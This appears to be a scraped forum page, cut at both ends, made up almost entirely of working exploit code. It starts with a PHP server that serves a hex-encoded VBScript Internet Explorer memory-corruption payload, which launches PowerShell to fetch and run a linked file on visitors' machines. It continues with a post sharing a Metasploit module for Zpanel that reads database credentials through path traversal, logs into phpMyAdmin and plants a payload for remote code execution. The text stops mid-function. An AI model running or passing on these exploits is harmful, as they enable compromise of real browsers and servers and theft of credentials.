"\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e". "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61". "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73". "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55". "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61". "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78". "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20". "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a". "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28". "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a". "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a". "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65". "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20". "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69". "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e". "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20". "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a". "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61". "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68". "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30". "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72". "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68". "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28". "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f". "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75". "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69". "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e". "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29". "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d". "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69". "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f". "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33". "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e". "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66". "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20". "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72". "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76". "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43". "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20". "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74". "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74". "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e". "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69". "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32". "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a". "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30". "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d". "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61". "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34". "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61". "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75". "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20". "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e". "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20". "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28". "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20". "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20". "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b". "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28". "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68". "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20". "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37". "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75". "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d". "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20". "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20". "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33". "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30". "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20". "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30". "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20". "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65". "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34". "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38". "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28". "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29". "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69". "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61". "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28". "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29". "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66". "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20". "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d". "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20". "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69". "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20". "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46". "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28". "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20". "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49". "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72". "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a". "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65". "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45". "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20". "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65". "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29". "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20". "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36". "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64". "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d". "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e"; $msgd=$msg; $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($socket)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; " . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
  11. mohammad_ghazei

    Hacking-Penetration testing to the site

    require 'msf/core' require 'msf/core/exploit/php_exe' require 'nokogiri' require 'uri' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Zpanel Remote Unauthenticated RCE', 'Description' => %q{ This module exploits an information disclosure vulnerability in Zpanel. The vulnerability is due to a vulnerable version of pChart used by ZPanel that allows unauthenticated users to read arbitrary files remotely on the file system. This particular module utilizes this vulnerability to identify the username/password combination of the MySQL instance. With the credentials the attackers can login to PHPMyAdmin and execute SQL commands to drop a malicious payload on the filesystem and call it leading to remote code execution. }, 'Author' => [ 'Balazs Makany', # pChart vuln discovery 'Jose Antonio Perez', # Found vulnerable version of pChart on ZPanel 'dawn isabel', 'brad wolfe', 'brent morris', 'james fitts' ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '31173' ], # vulnerable version of pChart used by zpanel [ 'OSVDB', '102595' ], # vulnerable version of pChart used by zpanel [ 'URL', 'http://blog.0xlabs.com/2014/03/zpanel-10.1.x-remote-root.html' ], [ 'URL', 'http://pastebin.com/y5Pf4Yms' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 30 2014')) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Zpanel', '/zpanel']) ], self.class) end def get_setting(res, setting_name) n = ::Nokogiri::HTML(res.body) spans = n.search('//code//span//span') found_element = spans.select{ |e| /#{setting_name}/ === e.text }.first val = found_element.next.next.text val.scan(/['"]([[:print:]]+)['"]/).flatten.first || '' end def get_user(res) get_setting(res, 'user') end def get_passwd(res) get_setting(res, 'pass') end def get_dbname(res) get_setting(res, 'dbname') end def dot_dot_slash(uri) res = send_request_cgi({ 'method' =>'GET', 'uri' => normalize_uri("#{uri}", 'etc', 'lib', 'pChart2', 'examples', 'index.php'), 'vars_get' => { 'Action' => 'View', 'Script' => '../../../../cnf/db.php' } }) uname = get_user(res) passwd = get_passwd(res) dbname = get_dbname(res) return uname, passwd, dbname end def get_token_from_form(res) hidden_inputs = res.get_hidden_inputs hidden_inputs.first['token'] end def get_token_from_url(url) u = URI(url) u.query.split('&').each do |param| param_name, param_value = param.scan(/([[:print:]]+)=([[:print:]]+)/).flatten return param_value if param_name == 'token' end '' end def grab_sess_and_token(uri) print_status('Attempting to get PHPSESSIONID') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}"), }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to get PHPSESSID') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' if sid.length > 0 print_good('PHPSESSID identified!') print_good("PHPSESSID = #{sid.split("=")[1]}") print_status('Attempting to get CSRF token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", 'etc', 'apps', 'phpmyadmin', 'index.php'), 'Cookie' => "#{sid}" }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to get CSRF token') end token = get_token_from_form(res) cookies = res.get_cookies cookies = cookies.split('; ') cookies = "#{cookies[-1]} #{cookies[1]}; #{cookies[2]}; #{cookies[3]}; #{sid}" if token.length > 0 print_good('CSRF token identified!') print_good("CSRF token = #{token}") return cookies, token, sid else print_error('CSRF token could not be identified...') end else print_error('PHPSESSID could not be identified...') end end def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id) old_cookies = cookies res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('etc', 'apps', 'phpmyadmin', 'index.php'), 'cookie' => cookies, 'ctype' => 'application/x-www-form-urlencoded', 'headers'=> { 'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/", }, 'vars_post' => { 'pma_username' => uname, 'pma_password' => passwd, 'server' => '1', 'lang' => 'en', 'collation_connection' => 'utf8_general_ci', 'token' => token } }) cookies = "#{res.get_cookies}" old_cookies = old_cookies.split("; ") cookies = cookies.split("; ") new_cookies = "#{old_cookies[0]}; " new_cookies << "#{old_cookies[1]}; " new_cookies << "#{old_cookies[2]}; " new_cookies << "#{old_cookies[3]}; " new_cookies << 